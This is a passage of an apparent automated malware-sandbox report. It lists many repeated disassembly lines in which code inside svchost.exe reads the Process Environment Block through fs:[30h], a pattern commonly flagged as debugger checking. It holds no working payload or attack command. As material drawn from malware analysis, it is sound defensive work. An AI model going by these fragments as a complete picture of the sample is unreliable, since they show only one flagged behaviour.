          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
